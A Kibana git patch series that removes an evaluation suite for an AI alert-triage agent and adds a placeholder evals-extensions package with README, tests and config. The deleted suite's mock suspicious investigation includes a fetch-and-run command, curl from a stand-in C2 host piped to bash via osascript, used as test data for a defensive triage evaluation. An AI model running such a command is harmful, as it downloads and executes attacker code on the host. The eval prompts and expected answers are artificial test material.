--- a/src/platform/packages/shared/kbn-scout/src/playwright/index.ts
+++ b/src/platform/packages/shared/kbn-scout/src/playwright/index.ts
@@ -9,8 +9,6 @@
 
 // Needed for Scout tests dependent on .peggy grammar files (`@kbn/tinymath`)
 import './peggy_setup';
-// Needed for packages that import .text files (e.g. @kbn/evals LLM prompt templates)
-import './dot_text_setup';
 
 // Config and utilities
 export { createPlaywrightConfig } from './config';
diff --git a/src/setup_node_env/exit_on_warning.js b/src/setup_node_env/exit_on_warning.js
index 379155f07ce6f..40d78071f9a4a 100644
--- a/src/setup_node_env/exit_on_warning.js
+++ b/src/setup_node_env/exit_on_warning.js
@@ -107,11 +107,6 @@ var IGNORE_WARNINGS = [
     messageContains:
       'Keys with collection values will be stringified due to JS Object restrictions',
   },
-  // Playwright workers set FORCE_COLOR while NO_COLOR may also be set
-  {
-    name: 'Warning',
-    messageContains: "'NO_COLOR' env is ignored due to the 'FORCE_COLOR' env being set",
-  },
 ];
 
 if (process.noProcessWarnings !== true) {
diff --git a/x-pack/platform/packages/shared/agent-builder/kbn-evals-suite-agent-builder/evals/triage/triage.spec.ts b/x-pack/platform/packages/shared/agent-builder/kbn-evals-suite-agent-builder/evals/triage/triage.spec.ts
deleted file mode 100644
index 0c7427cf52d58..0000000000000
--- a/x-pack/platform/packages/shared/agent-builder/kbn-evals-suite-agent-builder/evals/triage/triage.spec.ts
+++ /dev/null
@@ -1,315 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0; you may not use this file except in compliance with the Elastic License
- * 2.0.
- */
-
-import { tags } from '@kbn/scout';
-import { createHash } from 'crypto';
-import { evaluate as base } from '../../src/evaluate';
-import type { EvaluateDataset } from '../../src/evaluate_dataset';
-import { createEvaluateDataset } from '../../src/evaluate_dataset';
-
-const AGENTS_API_BASE_PATH = '/api/agent_builder/agents';
-const SKILLS_API_BASE_PATH = '/api/agent_builder/skills';
-
-const TRIAGE_SKILL_IDS = [
-  'agentic-alert-triage-l1-investigation',
-  'agentic-alert-triage-l1-triage',
-  'agentic-alert-triage-orchestrator',
-  'agentic-alert-triage-threshold-context',
-  'agentic-alert-triage-l3-review',
-];
-
-const MOCK_ALERT_CONTEXT = [
-  'Alert ID: abc-123-def',
-  'Rule: Suspicious Process Execution via macOS Script',
-  'Severity: high',
-  'Time: 2026-03-18T10:00:00Z',
-  'Agent type: endpoint',
-  'Host: mbp-user1 (host-id-001)',
-  'OS: macos',
-  'User: user1@example.com (user1)',
-  'Source IP: 10.0.0.42',
-  'Process: osascript',
-  'SHA256: a1b2c3d4e5f6...',
-  '',
-  'Rule Description: Detects execution of osascript with suspicious arguments that may indicate social engineering.',
-  'Alert reason: osascript was executed with arguments matching known social engineering patterns on mbp-user1.',
-  'Known false positives: ["IT automation scripts using osascript for legitimate purposes"]',
-].join('\n');
-
-const MOCK_BENIGN_INVESTIGATION = [
-  'Verdict: False Positive',
-  'Assessment: benign',
-  'Summary: The osascript execution was triggered by an IT automation script (Jamf policy) deploying a standard configuration profile.',
-  '',
-  '## Evidence',
-  '- Process command line: osascript -e \'tell application "System Events" to display dialog "Install update?"\'',
-  '- Parent process: jamf (PID 1234), signed by Jamf',
-  '- The Jamf agent on this host has a policy that uses osascript for user-facing dialogs during patch deployment',
-  '- No network connections from the osascript process',
-  '- Host alerts 24h: 0 other alerts on this host',
-  '- Okta: normal login patterns for user1@example.com (1 login, 1 IP, US only)',
-  '',
-  '## Timeline',
-  '- 09:55 — Jamf policy "Q1 Patch Deploy" started on mbp-user1',
-  '- 10:00 — osascript executed by jamf to display update dialog',
-  '- 10:01 — User clicked OK, dialog dismissed',
-].join('\n');
-
-const MOCK_SUSPICIOUS_INVESTIGATION = [
-  'Verdict: True Positive',
-  'Assessment: suspicious',
-  'Summary: The osascript execution does not match any known Jamf or IT automation pattern and includes obfuscated arguments.',
-  '',
-  '## Evidence',
-  '- Process command line: osascript -e \'do shell script "curl http://evil.example.com/payload | bash"\'',
-  '- Parent process: Terminal.app (PID 5678), user-initiated',
-  '- No matching Jamf policies on this host',
-  '- The curl target (evil.example.com) resolves to an IP associated with known C2 infrastructure',
-  '- Host alerts 24h: 3 other alerts — "Suspicious Network Connection", "Unsigned Binary Execution"',
-  '- Okta: user1@example.com logged in from 2 distinct IPs in 2 countries (US, RU) in the last 24h',
-  '',
-  '## Timeline',
-  '- 09:30 — User logged in from unusual IP (RU)',
-  '- 09:45 — Terminal.app opened',
-  '- 10:00 — osascript executed with curl | bash payload',
-  '- 10:02 — Outbound connection to evil.example.com detected',
-].join('\n');
-
-const evaluate = base.extend<{ evaluateDataset: EvaluateDataset }, {}>({
-  evaluateDataset: [
-    ({ chatClient, evaluators, executorClient, traceEsClient, log }, use) => {
-      use(
-        createEvaluateDataset({
-          chatClient,
-          evaluators,
-          executorClient,
-          traceEsClient,
-          log,
-        })
-      );
-    },
-    { scope: 'test' },
-  ],
-});
-
-evaluate.describe(
-  'Agentic Alert Triage - Skill Migration Evals',
-  { tag: tags.stateful.classic },
-  () => {
-    let triageAgentId: string | undefined;
-
-    evaluate.beforeAll(async ({ fetch, log, connector }) => {
-      // Verify that the triage skills exist (they should be pre-imported)
-      for (const skillId of TRIAGE_SKILL_IDS) {
-        try {
-          await fetch(`${SKILLS_API_BASE_PATH}/${encodeURIComponent(skillId)}`, {
-            version: '2023-10-31',
-          });
-          log.debug(`Skill verified: ${skillId}`);
-        } catch {
-          log.warning(`Skill ${skillId} not found — import it before running this suite`);
-        }
-      }
-
-      // Create a dedicated eval agent with the triage skills attached
-      const connectorHash = createHash('sha256').update(connector.id).digest('hex').slice(0, 8);
-      const ts = Date.now().toString(36);
-      const agentId = `eval_triage_${connectorHash}_${ts}`;
-
-      await fetch(AGENTS_API_BASE_PATH, {
-        method: 'POST',
-        version: '2023-10-31',
-        body: JSON.stringify({
-          id: agentId,
-          name: 'Eval: Agentic Alert Triage',
-          description: 'Evaluation agent for triage skill migration testing.',
-          configuration: {
-            enable_elastic_capabilities: true,
-            skill_ids: TRIAGE_SKILL_IDS,
-            tools: [],
-          },
-        }),
-      });
-
-      triageAgentId = agentId;
-      log.info(`Created eval agent: ${agentId}`);
-    });
-
-    evaluate.afterAll(async ({ fetch, log }) => {
-      if (triageAgentId) {
-        try {
-          await fetch(`${AGENTS_API_BASE_PATH}/${encodeURIComponent(triageAgentId)}`, {
-            method: 'DELETE',
-            version: '2023-10-31',
-          });
-          log.debug(`Deleted eval agent: ${triageAgentId}`);
-        } catch (e) {
-          log.warning(
-            `Failed to delete eval agent "${triageAgentId}": ${
-              e instanceof Error ? e.message : String(e)
-            }`
-          );
-        }
-      }
-    });
-
-    evaluate(
-      'L1 investigation produces structured Markdown with verdict',
-      async ({ evaluateDataset }) => {
-        if (!triageAgentId) {
-          throw new Error('Expected triageAgentId to be set in beforeAll');
-        }
-
-        await evaluateDataset({
-          dataset: {
-            name: 'agentic-triage: l1-investigation',
-            description:
-              'Validates that the L1 investigation skill produces a Markdown report with Verdict, Assessment, and Summary.',
-            examples: [
-              {
-                input: {
-                  question: `Investigate this security alert and return your findings in Markdown.\n\n=== ALERT CONTEXT ===\n${MOCK_ALERT_CONTEXT}`,
-                },
-                output: {
-                  expected:
-                    'A Markdown investigation report containing Verdict, Assessment, and Summary fields, followed by evidence and timeline sections.',
-                },
-                metadata: {
-                  agentId: triageAgentId,
-                },
-              },
-            ],
-          },
-        });
-      }
-    );
-
-    evaluate(
-      'L1 triage classifies benign alert correctly',
-      async ({ evaluateDataset }) => {
-        if (!triageAgentId) {
-          throw new Error('Expected triageAgentId to be set in beforeAll');
-        }
-
-        await evaluateDataset({
-          dataset: {
-            name: 'agentic-triage: l1-triage-benign',
-            description:
-              'Validates that the agent classifies a clearly benign alert as benign with high confidence.',
-            examples: [
-              {
-                input: {
-                  question: `Classify this alert based on the L1 investigation findings.\n\n=== L1 INVESTIGATION FINDINGS ===\n${MOCK_BENIGN_INVESTIGATION}\n\n=== ALERT CONTEXT ===\n${MOCK_ALERT_CONTEXT}`,
-                },
-                output: {
-                  expected:
-                    'JSON output with assessment "benign" and confidence "high", since the investigation clearly concludes this is a false positive from IT automation.',
-                },
-                metadata: {
-                  agentId: triageAgentId,
-                },
-              },
-            ],
-          },
-        });
-      }
-    );
-
-    evaluate(
-      'L1 triage classifies suspicious alert correctly',
-      async ({ evaluateDataset }) => {
-        if (!triageAgentId) {
-          throw new Error('Expected triageAgentId to be set in beforeAll');
-        }
-
-        await evaluateDataset({
-          dataset: {
-            name: 'agentic-triage: l1-triage-suspicious',
-            description:
-              'Validates that the agent classifies a suspicious alert as suspicious or malicious.',
-            examples: [
-              {
-                input: {
-                  question: `Classify this alert based on the L1 investigation findings.\n\n=== L1 INVESTIGATION FINDINGS ===\n${MOCK_SUSPICIOUS_INVESTIGATION}\n\n=== ALERT CONTEXT ===\n${MOCK_ALERT_CONTEXT}`,
-                },
-                output: {
-                  expected:
-                    'JSON output with assessment "suspicious" or "malicious" since the investigation shows obfuscated osascript with curl to known C2, multi-country logins, and correlated alerts.',
-                },
-                metadata: {
-                  agentId: triageAgentId,
-                },
-              },
-            ],
-          },
-        });
-      }
-    );
-
-    evaluate(
-      'Orchestrator produces full triage report with all sections',
-      async ({ evaluateDataset }) => {
-        if (!triageAgentId) {
-          throw new Error('Expected triageAgentId to be set in beforeAll');
-        }
-
-        await evaluateDataset({
-          dataset: {
-            name: 'agentic-triage: orchestrator-full-flow',
-            description:
-              'Validates the orchestrator skill produces a comprehensive report with L1, L2, and L3 sections.',
-            examples: [
-              {
-                input: {
-                  question: `Orchestrate the full triage in one run for this alert.\n\n=== ALERT CONTEXT ===\n${MOCK_ALERT_CONTEXT}\n\nSignals index: .siem-signals-infosec-detections`,
-                },
-                output: {
-                  expected:
-                    'A structured Markdown report containing L1 Investigation with Verdict/Assessment/Summary, L1 Triage JSON with assessment/confidence/reasoning, L2 Findings with domain-specific analysis, and L3 Review with final assessment.',
-                },
-                metadata: {
-                  agentId: triageAgentId,
-                },
-              },
-            ],
-          },
-        });
-      }
-    );
-
-    evaluate(
-      'Orchestrator handles benign alert with appropriate assessment',
-      async ({ evaluateDataset }) => {
-        if (!triageAgentId) {
-          throw new Error('Expected triageAgentId to be set in beforeAll');
-        }
-
-        await evaluateDataset({
-          dataset: {
-            name: 'agentic-triage: orchestrator-benign',
-            description:
-              'Validates the orchestrator correctly identifies a benign alert given clear false-positive context.',
-            examples: [
-              {
-                input: {
-                  question: `Orchestrate the full triage for this alert. The workstation lookup shows it is owned by IT admin and the process is part of standard Jamf deployment.\n\n=== ALERT CONTEXT ===\n${MOCK_ALERT_CONTEXT}\n\n=== WORKSTATION OWNER ===\nuser1@example.com, IT Admin, managed by Jamf\n\n=== ENRICHMENT ===\nHost alerts 24h: 0 other alerts\nOkta: 1 login from expected office IP\nCorrelated alerts 72h: none`,
-                },
-                output: {
-                  expected:
-                    'Report concludes benign/false positive with high confidence. The triage JSON should show assessment "benign". The review should recommend closing the alert.',
-                },
-                metadata: {
-                  agentId: triageAgentId,
-                },
-              },
-            ],
-          },
-        });
-      }
-    );
-  }
-);

From 42500c20ae0ea32ea31c15ff648f91e7fcbd4646 Mon Sep 17 00:00:00 2001
From: Patryk Kopycinski <patryk.kopycinski@elastic.co>
Date: Fri, 20 Mar 2026 09:14:04 +0100
Subject: [PATCH 04/15] feat(evals): create @kbn/evals-extensions foundation
 package
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

This establishes the structure for advanced evaluation capabilities
ported from cursor-plugin-evals and serves as the home for Phases 3-5
of the evals roadmap.

## Architecture

The dependency is strictly one-way: @kbn/evals-extensions builds on @kbn/evals, while @kbn/evals stays completely independent of the extensions:

```
Evaluation Suites
     ├──> @kbn/evals (core)
     └──> @kbn/evals-extensions (advanced features)
              └──> depends on @kbn/evals
```

**Dependency Rule:**
- ✅ kbn-evals-extensions CAN import from kbn-evals
- ❌ kbn-evals MUST NOT import from kbn-evals-extensions

## This PR

**What's included:**
- Package structure (package.json, kibana.jsonc, tsconfig.json)
- Placeholder exports (no functional changes)
- Test infrastructure (4 passing tests)
- Comprehensive documentation

**What's NOT included:**
- No functional features (placeholder exports only)
- No changes to @kbn/evals package
- No changes to evaluation suite behavior

## Validation

✅ Bootstrap completed successfully
✅ Type check passed
✅ All tests passing (4/4)
✅ ESLint passed
✅ No circular dependencies
✅ check_changes.ts passed

## Roadmap

This foundation enables parallel development of:
- PR #2: Cost tracking & metadata enrichment
- PR #3: Dataset management utilities
- PR #4: Safety evaluators (toxicity, PII, bias, etc.)
- PR #5: UI components (run comparison, example explorer)
- PR #6: DX enhancements (watch mode, caching, parallel)
- PR #7: Advanced analytics
- PR #8: A/B testing & active learning
- PR #9: Human-in-the-loop workflows
- PR #10: IDE integration

## Related Issues

- Closes part of #257821 (Epic: Extend @kbn/evals)
- Enables #257823 (Phase 2: CI Quality Gates)
- Enables #257824 (Phase 3: Red-Teaming)
- Enables #257825 (Phase 4: Lens Dashboards)
- Enables #257826 (Phase 5: Auto-Generation)
- Addresses #255820 (kbn/evals <-> Agent Builder completeness)

Co-Authored-By: Claude Sonnet 4.5 (1M context) <noreply@anthropic.com>
---
 .github/CODEOWNERS                            |   1 +
 package.json                                  |   1 +
 tsconfig.base.json                            |   2 +
 .../shared/kbn-evals-extensions/.gitignore    |  17 ++
 .../shared/kbn-evals-extensions/README.md     | 211 ++++++++++++++++++
 .../__tests__/package.test.ts                 |  54 +++++
 .../shared/kbn-evals-extensions/index.ts      |  82 +++++++
 .../kbn-evals-extensions/jest.config.js       |  12 +
 .../shared/kbn-evals-extensions/kibana.jsonc  |   6 +
 .../shared/kbn-evals-extensions/package.json  |  22 ++
 .../shared/kbn-evals-extensions/src/index.ts  |  14 ++
 .../kbn-evals-extensions/src/types/index.ts   |  47 ++++
 .../kbn-evals-extensions/src/utils/index.ts   |  19 ++
 .../shared/kbn-evals-extensions/tsconfig.json |  27 +++
 yarn.lock                                     |  12 +
 15 files changed, 527 insertions(+)
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/.gitignore
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/README.md
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/__tests__/package.test.ts
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/index.ts
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/jest.config.js
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/kibana.jsonc
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/package.json
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/src/index.ts
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/src/types/index.ts
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/src/utils/index.ts
 create mode 100644 x-pack/platform/packages/shared/kbn-evals-extensions/tsconfig.json

diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS
index 62e2aa5582bbc..25d013e6e8338 100644
--- a/.github/CODEOWNERS
+++ b/.github/CODEOWNERS
@@ -3256,3 +3256,4 @@ x-pack/solutions/observability/plugins/synthetics/server/saved_objects/synthetic
 ####
 ## These rules are always last so they take ultimate priority over everything else
 ####
+/x-pack/platform/packages/shared/kbn-evals-extensions/ @elastic/kibana-obs-ai
diff --git a/package.json b/package.json
index c5a76cc61104f..f4c5c22a4b341 100644
--- a/package.json
+++ b/package.json
@@ -626,6 +626,7 @@
     "@kbn/eui-provider-dev-warning": "link:src/platform/test/plugin_functional/plugins/eui_provider_dev_warning",
     "@kbn/eval-kql": "link:src/platform/packages/shared/kbn-eval-kql",
     "@kbn/evals-common": "link:x-pack/platform/packages/shared/kbn-evals-common",
+    "@kbn/evals-extensions": "link:x-pack/platform/packages/shared/kbn-evals-extensions",
     "@kbn/evals-plugin": "link:x-pack/platform/plugins/shared/evals",
     "@kbn/event-annotation-common": "link:src/platform/packages/shared/kbn-event-annotation-common",
     "@kbn/event-annotation-components": "link:src/platform/packages/shared/kbn-event-annotation-components",
diff --git a/tsconfig.base.json b/tsconfig.base.json
index 6134a34a01b3c..dc0562f6c43af 100644
--- a/tsconfig.base.json
+++ b/tsconfig.base.json
@@ -1136,6 +1136,8 @@
       "@kbn/evals/*": ["x-pack/platform/packages/shared/kbn-evals/*"],
       "@kbn/evals-common": ["x-pack/platform/packages/shared/kbn-evals-common"],
       "@kbn/evals-common/*": ["x-pack/platform/packages/shared/kbn-evals-common/*"],
+      "@kbn/evals-extensions": ["x-pack/platform/packages/shared/kbn-evals-extensions"],
+      "@kbn/evals-extensions/*": ["x-pack/platform/packages/shared/kbn-evals-extensions/*"],
       "@kbn/evals-phoenix-executor": ["x-pack/platform/packages/shared/kbn-evals-phoenix-executor"],
       "@kbn/evals-phoenix-executor/*": ["x-pack/platform/packages/shared/kbn-evals-phoenix-executor/*"],
       "@kbn/evals-plugin": ["x-pack/platform/plugins/shared/evals"],
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/.gitignore b/x-pack/platform/packages/shared/kbn-evals-extensions/.gitignore
new file mode 100644
index 0000000000000..c3d694ce14f84
--- /dev/null
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/.gitignore
@@ -0,0 +1,17 @@
+# Build output
+target/
+*.js
+!jest.config.js
+*.d.ts
+tsconfig.tsbuildinfo
+
+# Dependencies
+node_modules/
+
+# IDE
+.vscode/
+.idea/
+
+# OS
+.DS_Store
+Thumbs.db
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/README.md b/x-pack/platform/packages/shared/kbn-evals-extensions/README.md
new file mode 100644
index 0000000000000..4c4e87be6bcb2
--- /dev/null
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/README.md
@@ -0,0 +1,211 @@
+# @kbn/evals-extensions
+
+Advanced evaluation capabilities for `@kbn/evals` - **standalone extensions package**.
+
+## Purpose
+
+This package extends `@kbn/evals` with advanced features ported from [cursor-plugin-evals](https://github.com/patrykkopycinski/cursor-plugin-evals) and serves as the home for Phases 3-5 of the evals roadmap.
+
+## Architecture: Independent Package Design
+
+**Critical principle:** the dependency is strictly **one-way** — this package builds on `@kbn/evals`, while `@kbn/evals` stays **completely independent** of this package.
+
+```
+┌─────────────────────────────────────────────────────┐
+│              Evaluation Suites                      │
+│  (agent-builder, obs-ai-assistant, security)        │
+└──────────────────┬──────────────────────────────────┘
+                   │
+        ┌──────────┴──────────┐
+        │                     │
+        ▼                     ▼
+┌──────────────────┐   ┌─────────────────────────────┐
+│   @kbn/evals     │   │   @kbn/evals-extensions     │
+│   (core)         │   │   (advanced features)       │
+│                  │   │                             │
+│ ✅ Evaluators    │   │ ✅ Safety evaluators        │
+│ ✅ Scout/PW      │   │ ✅ Cost tracking            │
+│ ✅ ES export     │   │ ✅ Dataset management       │
+│ ✅ Stats         │   │ ✅ UI components            │
+│ ✅ CLI basics    │   │ ✅ Watch mode               │
+│                  │   │ ✅ A/B testing              │
+│ ❌ NO imports    │   │ ✅ Human-in-the-loop        │
+│    from ext ─────┼───┼──X                          │
+│                  │   │                             │
+└──────────────────┘   └──────────┬──────────────────┘
+                                  │
+                                  │ depends on
+                                  ▼
+                       ┌──────────────────┐
+                       │   @kbn/evals     │
+                       │   (types, utils) │
+                       └──────────────────┘
+```
+
+**Dependency Rules:**
+- ✅ `kbn-evals-extensions` CAN import from `kbn-evals`
+- ❌ `kbn-evals` MUST NOT import from `kbn-evals-extensions`
+- ✅ Evaluation suites can use both packages independently
+
+## Features
+
+### Current Status: Foundation (PR #1)
+- ✅ Package structure established
+- ✅ Build configuration
+- ✅ Test infrastructure
+- ❌ No functional features yet (placeholder exports only)
+
+### Roadmap
+
+#### **PR #2: Cost Tracking & Metadata** (Weeks 2-3)
+- Token-based cost calculation
+- Hyperparameter tracking (temperature, top_p, etc.)
+- Environment snapshots (Kibana/ES versions, plugins)
+- Run tagging and annotations
+
+#### **PR #3: Dataset Management** (Weeks 4-6)
+- Dataset versioning (semantic versioning)
+- Schema validation (Zod-based)
+- Deduplication (similarity-based)
+- Merging and splitting utilities
+- Filtering and statistics
+
+#### **PR #4: Safety Evaluators** (Weeks 7-10)
+- Toxicity detection
+- PII detection
+- Bias detection
+- Hallucination detection
+- Refusal testing
+- Content moderation
+
+#### **PR #5: UI Components** (Weeks 11-16)
+- Run comparison viewer (side-by-side diff)
+- Example explorer (worst-case analysis)
+- Score distribution charts
+- Integration with evals Kibana plugin
+
+#### **PR #6: DX Enhancements** (Weeks 17-21)
+- Watch mode (auto-rerun on changes)
+- Parallel execution (multi-suite concurrency)
+- Result caching (skip unchanged examples)
+- Incremental evaluation (delta-only runs)
+- Interactive mode (step-through debugging)
+- Dry-run mode (validation without execution)
+
+#### **PR #7: Advanced Analytics** (Weeks 22-24)
+- Confidence intervals (bootstrapping)
+- Outlier detection (Z-score, IQR, Isolation Forest)
+- Failure clustering (K-means, hierarchical)
+- Error taxonomy
+- Ensemble evaluation
+- Calibration analysis
+
+#### **PR #8: A/B Testing & Active Learning** (Weeks 25-29)
+- A/B testing framework with statistical tests
+- Bandit algorithms (epsilon-greedy, UCB, Thompson sampling)
+- Active learning (uncertainty and diversity sampling)
+
+#### **PR #9: Human-in-the-Loop** (Weeks 30-35)
+- Review queue UI
+- Annotation interface
+- Assignment workflow
+- Inter-rater reliability
+- Conflict resolution
+
+#### **PR #10: IDE Integration** (Weeks 36-39)
+- VS Code extension
+- Cursor skills for eval authoring
+- AI-assisted dataset creation
+
+## Usage
+
+### Opting In to Extensions
+
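+Evaluation suites import extensions explicitly. The example below illustrates the planned API; the foundation release ships placeholder exports only, so these symbols are not available yet: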
+
+```typescript
+// Example: agent-builder evaluation suite
+import { evaluate } from '@kbn/evals';
+import {
+  createToxicityEvaluator,
+  createPiiDetector,
+  createBiasEvaluator,
+  costTracker,
+  watchMode
+} from '@kbn/evals-extensions';
+
+evaluate('security test', async ({ executorClient }) => {
+  // Mix core and extension evaluators
+  await executorClient.runExperiment(
+    { dataset, task },
+    [
+      ...createCorrectnessEvaluators(),     // core kbn/evals
+      createToxicityEvaluator(),            // extension
+      createPiiDetector(),                  // extension
+    ]
+  );
+
+  // Use extension features
+  await costTracker.logRunCost(executorClient.getRunId());
+});
+```
+
+### Feature Flags
+
+Once the corresponding features land (see the roadmap above), extensions will use environment variables for opt-in behavior:
+
+```bash
+# Enable watch mode
+KBN_EVALS_EXT_WATCH_MODE=true node scripts/evals run --suite <id>
+
+# Enable parallel execution
+KBN_EVALS_EXT_PARALLEL=true node scripts/evals run --suite <id>
+
+# Enable result caching
+KBN_EVALS_EXT_CACHE=true node scripts/evals run --suite <id>
+```
+
+## Why a Separate Package?
+
+1. **Clear boundaries** - Extensions don't pollute core framework
+2. **Independent evolution** - Iterate without affecting core
+3. **Optional adoption** - Suites choose which features to use
+4. **Parallel development** - Teams work without conflicts
+5. **Easier testing** - Integration tests isolated
+6. **Future migration** - Can promote mature features to core later
+
+## Vision Alignment
+
+All features follow principles from "Future of @kbn/evals":
+- **Trace-first**: Leverage OTel traces when applicable
+- **Elastic-native**: No external dependencies
+- **Shared layer**: Provide composable primitives
+- **Code-defined**: Datasets versioned in code
+
+## Development
+
+### Running Tests
+
+```bash
+yarn test:jest --testPathPattern=kbn-evals-extensions
+```
+
+### Type Checking
+
+```bash
+yarn test:type_check --project x-pack/platform/packages/shared/kbn-evals-extensions/tsconfig.json
+```
+
+### Linting
+
+```bash
+node scripts/eslint --fix x-pack/platform/packages/shared/kbn-evals-extensions
+```
+
+## Contributing
+
+See individual feature directories for contribution guidelines. All PRs should:
+- Follow Kibana code standards
+- Include unit tests
+- Update this README with new exports
+- Keep the dependency one-way: never import `@kbn/evals-extensions` from `@kbn/evals` core
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/__tests__/package.test.ts b/x-pack/platform/packages/shared/kbn-evals-extensions/__tests__/package.test.ts
new file mode 100644
index 0000000000000..3415c9e23dc3a
--- /dev/null
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/__tests__/package.test.ts
@@ -0,0 +1,54 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0; you may not use this file except in compliance with the Elastic License
+ * 2.0.
+ */
+
+/**
+ * Basic package health checks for @kbn/evals-extensions
+ */
+
+import { EVALS_EXTENSIONS_VERSION } from '..';
+
+describe('@kbn/evals-extensions', () => {
+  describe('package structure', () => {
+    it('should export EVALS_EXTENSIONS_VERSION', () => {
+      expect(EVALS_EXTENSIONS_VERSION).toBe('1.0.0');
+    });
+
+    it('should be importable without errors', async () => {
+      await expect(async () => {
+        await import('..');
+      }).resolves.not.toThrow();
+    });
+  });
+
+  describe('dependency isolation', () => {
+    it('should not create circular dependencies with @kbn/evals', async () => {
+      // This test ensures we maintain one-way dependency:
+      // kbn-evals-extensions → depends on → kbn-evals
+      // kbn-evals → MUST NOT depend on → kbn-evals-extensions
+
+      // Both packages should be importable
+      const evalsExtensions = await import('..');
+      const kbnEvals = await import('@kbn/evals');
+
+      expect(evalsExtensions).toBeDefined();
+      expect(kbnEvals).toBeDefined();
+
+      // kbn-evals-extensions can use kbn-evals types (verified by compilation)
+      // kbn-evals should have no knowledge of kbn-evals-extensions
+      // This is enforced by TypeScript references in tsconfig.json
+    });
+  });
+
+  describe('exports', () => {
+    it('should re-export core types from @kbn/evals', async () => {
+      // Type exports are verified at compile time
+      // Runtime check just ensures module loads
+      const exports = await import('..');
+      expect(exports).toBeDefined();
+    });
+  });
+});
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/index.ts b/x-pack/platform/packages/shared/kbn-evals-extensions/index.ts
new file mode 100644
index 0000000000000..5a82567054db1
--- /dev/null
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/index.ts
@@ -0,0 +1,82 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0; you may not use this file except in compliance with the Elastic License
+ * 2.0.
+ */
+
+/**
+ * @kbn/evals-extensions - Advanced evaluation capabilities
+ *
+ * This package provides standalone extensions for @kbn/evals.
+ * It does NOT modify the core @kbn/evals package.
+ *
+ * ## Architecture
+ *
+ * Dependency flow:
+ * - ✅ kbn-evals-extensions → imports from → kbn-evals
+ * - ❌ kbn-evals → MUST NOT import from → kbn-evals-extensions
+ *
+ * Evaluation suites can opt in to extensions by importing directly (planned API, see Roadmap):
+ *
+ * @example
+ * ```typescript
+ * import { evaluate } from '@kbn/evals';
+ * import { createToxicityEvaluator, costTracker } from '@kbn/evals-extensions';
+ *
+ * evaluate('test', async ({ executorClient }) => {
+ *   await executorClient.runExperiment(
+ *     { dataset, task },
+ *     [createToxicityEvaluator()]  // Extension evaluator (planned for PR #4)
+ *   );
+ *   await costTracker.logRunCost(runId);  // Extension feature (planned for PR #2)
+ * });
+ * ```
+ *
+ * ## Roadmap
+ *
+ * Features are being added incrementally:
+ * - **PR #1**: Foundation (current) - Package setup, no functional changes
+ * - **PR #2**: Cost tracking & metadata
+ * - **PR #3**: Dataset management utilities
+ * - **PR #4**: Safety evaluators (toxicity, PII, bias, etc.)
+ * - **PR #5**: UI components (run comparison, example explorer)
+ * - **PR #6**: DX enhancements (watch mode, caching, parallel execution)
+ * - **PR #7**: Advanced analytics (confidence intervals, outlier detection)
+ * - **PR #8**: A/B testing & active learning
+ * - **PR #9**: Human-in-the-loop workflows
+ * - **PR #10**: IDE integration (VS Code extension, Cursor skills)
+ *
+ * @packageDocumentation
+ */
+
+// Re-export core types from @kbn/evals for convenience.
+// Users can import from one place; type-only re-exports do not create a reverse dependency.
+export type { Evaluator, Example, EvaluationDataset, TaskOutput } from '@kbn/evals';
+
+export type { EvaluationScoreDocument } from '@kbn/evals';
+
+/**
+ * Configuration shape for extension features; a stub to be populated in future PRs.
+ */
+export interface ExtensionConfig {
+  /**
+   * Stand-in field so the interface is not empty; nothing in this package reads it yet.
+   * Will be replaced by real options as features are added.
+   */
+  placeholder?: string;
+}
+
+/**
+ * Feature exports (to be populated in future PRs)
+ *
+ * Examples of what will be exported:
+ * - export { createToxicityEvaluator } from './src/evaluators/safety/toxicity';
+ * - export { costTracker } from './src/tracking/cost_calculator';
+ * - export { watchMode } from './src/execution/watch_mode';
+ * - export { createABTest } from './src/experimentation/ab_testing/framework';
+ * - export { reviewQueue } from './src/human_review/workflow/review_workflow';
+ */
+
+// Placeholder export so the package builds; same value as "version" in package.json and the test
+export const EVALS_EXTENSIONS_VERSION = '1.0.0';
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/jest.config.js b/x-pack/platform/packages/shared/kbn-evals-extensions/jest.config.js
new file mode 100644
index 0000000000000..60bb4e9652f53
--- /dev/null
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/jest.config.js
@@ -0,0 +1,12 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0; you may not use this file except in compliance with the Elastic License
+ * 2.0.
+ */
+
+module.exports = {
+  preset: '@kbn/test/jest_node',
+  rootDir: '../../../../..',
+  roots: ['<rootDir>/x-pack/platform/packages/shared/kbn-evals-extensions'],
+};
diff --git a/x-pack/platform/packages/shared/kbn-evals-extensions/kibana.jsonc b/x-pack/platform/packages/shared/kbn-evals-extensions/kibana.jsonc
new file mode 100644
index 0000000000000..6f03786515b8d
--- /dev/null
+++ b/x-pack/platform/packages/shared/kbn-evals-extensions/kibana.jsonc
